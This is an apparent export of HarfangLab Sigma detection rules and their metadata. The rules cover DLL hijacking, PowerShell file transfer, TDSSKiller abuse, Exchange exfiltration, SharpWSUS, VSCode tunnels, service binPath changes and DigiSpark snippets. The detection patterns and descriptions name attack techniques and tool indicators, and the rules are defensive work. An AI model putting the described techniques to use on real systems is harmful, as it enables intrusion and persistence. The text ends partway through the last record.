"rule_description": "Detects potential Windows DLL Hijacking via LockAppHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cf01efb2-a2c9-4286-ad65-a64a2e04d787",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603819Z",
"creation_date": "2026-03-23T11:45:34.603822Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603830Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_msxml2_http_filetransfer.yml",
"content": "title: File Transferred via PowerShell Msxml2\nid: cf01efb2-a2c9-4286-ad65-a64a2e04d787\ndescription: |\n Detects PowerShell scripts using the Msxml2.XMLHTTP COM Object to download files via HTTP.\n Attackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate looking commands and network traffic.\n It is recommended to investigate the downloaded files and any programs executed in the context of this alert.\nreferences:\n - https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2022/08/18\nmodified: 2025/09/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1105\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'com'\n - 'Msxml2.XMLHTTP'\n - 'open('\n ScriptNumberOfLines|lte: 50\n\n exclusion_fsecure:\n ProcessImage: '?:\\program files (x86)\\f-secure\\\\*\\wa_3rd_party_host_32.exe'\n\n exclusion_zimbra:\n PowershellCommand|contains: 'function zimbra_auth'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cf01efb2-a2c9-4286-ad65-a64a2e04d787",
"rule_name": "File Transferred via PowerShell Msxml2",
"rule_description": "Detects PowerShell scripts using the Msxml2.XMLHTTP COM Object to download files via HTTP.\nAttackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate looking commands and network traffic.\nIt is recommended to investigate the downloaded files and any programs executed in the context of this alert.\n",
"rule_creation_date": "2022-08-18",
"rule_modified_date": "2025-09-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1059.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cfab5f72-5c39-43bc-a96c-5d5dd2f1e662",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090058Z",
"creation_date": "2026-03-23T11:45:34.090060Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090065Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_shutdown.yml",
"content": "title: DLL Hijacking via shutdown.exe\nid: cfab5f72-5c39-43bc-a96c-5d5dd2f1e662\ndescription: |\n Detects potential Windows DLL Hijacking via shutdown.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'shutdown.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d10warp.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cfab5f72-5c39-43bc-a96c-5d5dd2f1e662",
"rule_name": "DLL Hijacking via shutdown.exe",
"rule_description": "Detects potential Windows DLL Hijacking via shutdown.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cfb78c4e-68f4-425b-bc3a-c7b06c5421ce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627635Z",
"creation_date": "2026-03-23T11:45:34.627637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_tdsskiller.yml",
"content": "title: Execution of TDSSKiller\nid: cfb78c4e-68f4-425b-bc3a-c7b06c5421ce\ndescription: |\n Detects the execution of TDSSKiller, a free tool developed by Kaspersky for the detection and removal of rootkits.\n This tool is capable of disabling stubborn malicious processes via command prompt execution.\n LockBit 3.0 Ransomware group is already known to abuse this tool.\n It is recommended to analyze the host for past malicious activities as well as to investigate the process and user responsible for the installation of the tool to determine whether its usage is legitimate.\nreferences:\n - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/07/27\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.TDSSKiller\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Product: 'TDSSKiller'\n - OriginalFileName: 'TDSSKiller.exe'\n - InternalName: 'TDSSKiller'\n\n # This is handled by the rule 4c0aa693-e40f-4aad-8bb5-79144acd7b68\n filter_option:\n CommandLine|contains: '-dcsvc'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cfb78c4e-68f4-425b-bc3a-c7b06c5421ce",
"rule_name": "Execution of TDSSKiller",
"rule_description": "Detects the execution of TDSSKiller, a free tool developed by Kaspersky for the detection and removal of rootkits.\nThis tool is capable of disabling stubborn malicious processes via command prompt execution.\nLockBit 3.0 Ransomware group is already known to abuse this tool.\nIt is recommended to analyze the host for past malicious activities as well as to investigate the process and user responsible for the installation of the tool to determine whether its usage is legitimate.\n",
"rule_creation_date": "2023-07-27",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cfb81bd3-0386-43ec-a006-01c3b182a483",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083991Z",
"creation_date": "2026-03-23T11:45:34.083993Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083997Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1048_exfiltration_through_mail_protocol.yml",
"content": "title: Data Possibly Exfiltrated via Microsoft Exchange Mail Protocol\nid: cfb81bd3-0386-43ec-a006-01c3b182a483\ndescription: |\n Detects the creation of suspicious files in the pickup mail folder of a Microsoft Exchange server.\n This technique can be used by attackers to exfiltrate data from an infected system by using the Exchange mail server and sending data through mail protocols.\n The Turla attacker group has been known to use this technique in connection with its LightNeuron malware.\n It is recommended to analyze the process responsible for creating the EML file and to determine whether any sensitive data was exfiltrated through the Exchange server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://attack.mitre.org/techniques/T1048/\ndate: 2022/12/15\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\TransportRoles\\PickUp\\msg*.eml'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cfb81bd3-0386-43ec-a006-01c3b182a483",
"rule_name": "Data Possibly Exfiltrated via Microsoft Exchange Mail Protocol",
"rule_description": "Detects the creation of suspicious files in the pickup mail folder of a Microsoft Exchange server.\nThis technique can be used by attackers to exfiltrate data from an infected system by using the Exchange mail server and sending data through mail protocols.\nThe Turla attacker group has been known to use this technique in connection with its LightNeuron malware.\nIt is recommended to analyze the process responsible for creating the EML file and to determine whether any sensitive data was exfiltrated through the Exchange server.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d01d6ee0-cde6-4646-97d2-b11151bc2daf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076841Z",
"creation_date": "2026-03-23T11:45:34.076843Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076847Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/SharpWSUS",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_potential_usage_of_sharpwsus.yml",
"content": "title: Possible Lateral Movement via SharpWSUS\nid: d01d6ee0-cde6-4646-97d2-b11151bc2daf\ndescription: |\n Detects the usage of the SharpWSUS tool for lateral movement using WSUS (Windows Server Update Services).\n This tool can be used to locate a WSUS server, search for clients and push malicious updates, allowing for remote execution, and therefore lateralization.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/nettitude/SharpWSUS\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/10/10\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.SharpWSUS\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\SharpWSUS.exe'\n - OriginalFileName: 'SharpWSUS.exe'\n\n selection_create:\n CommandLine|contains|all:\n - ' create '\n - 'payload:'\n - 'args:'\n\n selection_approve:\n CommandLine|contains|all:\n - ' approve '\n - 'updateid:'\n - 'computername:'\n\n selection_check:\n CommandLine|contains|all:\n - ' check '\n - 'updateid:'\n - 'computername:'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d01d6ee0-cde6-4646-97d2-b11151bc2daf",
"rule_name": "Possible Lateral Movement via SharpWSUS",
"rule_description": "Detects the usage of the SharpWSUS tool for lateral movement using WSUS (Windows Server Update Services).\nThis tool can be used to locate a WSUS server, search for clients and push malicious updates, allowing for remote execution, and therefore lateralization.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1210"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d06949e6-3af6-4b5b-8b03-d0c0209f06dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094317Z",
"creation_date": "2026-03-23T11:45:34.094319Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094324Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1090/"
],
"name": "t1090_macos_vscode_tunnel_commandline.yml",
"content": "title: VSCode Proxy Tunnel Started via Command-line (macOS)\nid: d06949e6-3af6-4b5b-8b03-d0c0209f06dd\ndescription: |\n Detects the VSCode binary being used with a command-line indicating a network tunnel.\n In July 2023, Microsoft added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1090/\ndate: 2023/09/25\nmodified: 2025/04/01\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Tunneling\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith:\n - '/code'\n - '/codium'\n CommandLine|contains: ' tunnel'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d06949e6-3af6-4b5b-8b03-d0c0209f06dd",
"rule_name": "VSCode Proxy Tunnel Started via Command-line (macOS)",
"rule_description": "Detects the VSCode binary being used with a command-line indicating a network tunnel.\nIn July 2023, Microsoft added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2025-04-01",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d06afd6f-9ff1-4858-8887-ff171879096a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074028Z",
"creation_date": "2026-03-23T11:45:34.074031Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074035Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/003/",
"https://lolbas-project.github.io/lolbas/Binaries/Sc/"
],
"name": "t1543_003_modify_service_binpath.yml",
"content": "title: Service binPath Modified via sc.exe\nid: d06afd6f-9ff1-4858-8887-ff171879096a\ndescription: |\n Detects the modification of a service binPath using sc.exe.\n Adversaries can make changes to a Windows service binPath to point to a malicious payload.\n The payload is then executed the next time the service is started, achieving persistence and/or privilege escalation.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\n - https://lolbas-project.github.io/lolbas/Binaries/Sc/\ndate: 2022/11/10\nmodified: 2025/10/07\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains: ' config * binPath='\n\n exclusion_image:\n - ParentImage:\n - '?:\\Program Files\\EnergySaver Agent\\EnergyAgentService.exe'\n - '?:\\Program Files (x86)\\Energy Manager Agent\\EnergyAgentService.exe'\n - '?:\\Program Files\\AVOB\\Energy Saver Agent\\EnergyAgentService.exe'\n - '?:\\Program Files (x86)\\AVOB\\Energy Saver Agent\\EnergyAgentService.exe'\n - '?:\\Program Files\\Microsoft Azure Active Directory Connect\\AzureADConnect.exe'\n - '?:\\Program Files\\Microsoft Azure Active Directory Connect Upgrader\\Microsoft.Azure.ActiveDirectory.Synchronization.Upgrader.exe'\n - '?:\\Program Files (x86)\\MAXHUB\\MAXHUB PC Suite\\UPSSetupSetup.exe'\n - '?:\\Program Files (x86)\\MAXHUB\\MAXHUB PC Suite\\UdiServerSetupSetup.exe'\n - '?:\\Program Files (x86)\\Pritunl\\pritunl-service.exe'\n - '?:\\Program Files\\K2\\Setup\\SourceCode.SetupManager.exe'\n - '?:\\Program Files (x86)\\ECI DCA\\DCA.Edge.Console.exe'\n - GrandparentImage:\n - 
'?:\\ProgramData\\MSPEcosystem\\FileCache\\Upgrade\\Ecosystem.AgentSetup.exe'\n - '?:\\Program Files\\Ricoh\\RICOH CloudStream Client\\\\*\\cloudstreamclientcore.exe'\n - '?:\\Program Files (x86)\\Qualcomm\\QIKToolV?\\\\*\\qikv?.exe'\n - '?:\\Program Files (x86)\\PingPlotter *\\PingPlotter.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Program Files (x86)\\Lansweeper\\AutoUpdate\\Lansweeper.OnPremise.AutoUpdate.exe|'\n - '|?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe|'\n - '|?:\\Program Files\\Skyline Communications\\Skyline Taskbar Utility\\SLTaskbarUtility.exe|'\n - '|?:\\Program Files\\Octopus Deploy\\Tentacle\\Tentacle.exe|'\n - '|?:\\Program Files\\BMC Software\\BladeLogic\\RSCD\\RSCD.exe|'\n\n exclusion_brcow:\n CommandLine: '?:\\WINDOWS\\system32\\sc.exe config BrCow_* start= boot binPath= \\SYSTEMROOT\\SYSTEM32\\DRIVERS\\BrCow_*.sys'\n ParentImage: '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_cloudflare:\n CommandLine: 'sc.exe config CloudflareWARP binPath= \"?:\\Program Files\\Cloudflare\\Cloudflare WARP\\warp-svc.exe\"'\n\n exclusion_3shape:\n CommandLine: 'SC.exe CONFIG ThreeShape.DataService binPath= ?:\\Program Files\\3Shape\\3Shape Data Service\\ThreeShape.BlueWhale.DataService.exe'\n ParentImage: '?:\\Windows\\Microsoft.NET\\Framework64\\\\??.?.?????\\InstallUtil.exe'\n\n exclusion_synapse:\n CommandLine|contains: 'sc config Fuji* binPath= ?:\\Synapse\\OSD\\AdvancedReporting\\\\*.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d06afd6f-9ff1-4858-8887-ff171879096a",
"rule_name": "Service binPath Modified via sc.exe",
"rule_description": "Detects the modification of a service binPath using sc.exe.\nAdversaries can make changes to a Windows service binPath to point to a malicious payload.\nThe payload is then executed the next time the service is started, achieving persistence and/or privilege escalation.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2025-10-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d06f9bc2-420e-4291-93be-da3246c0dc81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073461Z",
"creation_date": "2026-03-23T11:45:34.073463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/",
"https://github.com/zer0overflow/DigiPwn",
"https://attack.mitre.org/techniques/T1091/",
"https://attack.mitre.org/techniques/T1200/"
],
"name": "t1200_popular_digispark_powershell_scripts.yml",
"content": "title: DigiSpark USB Malicious PowerShell Snippets\nid: d06f9bc2-420e-4291-93be-da3246c0dc81\ndescription: |\n Detects popular default PowerShell snippets deployed by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\n This rule detects snippets from various public repositories associated with DigiSpark. While some actions may not originate from a DigiSpark device, they may still be malicious.\n It is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged into this machine.\nreferences:\n - https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/\n - https://github.com/zer0overflow/DigiPwn\n - https://attack.mitre.org/techniques/T1091/\n - https://attack.mitre.org/techniques/T1200/\ndate: 2025/01/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1200\n - attack.t1091\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.DigiSpark\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Regards Your Digispark'\n - 'DigiSpark Report'\n - 'http://bit.ly/14bZZ0c'\n - 'Pwned from DigiSpark !'\n - 'https://vk.com/doc138418519_492631985'\n - '$code = {function My-Keypresses($Path='\n - 'Digi-WP-Mail'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
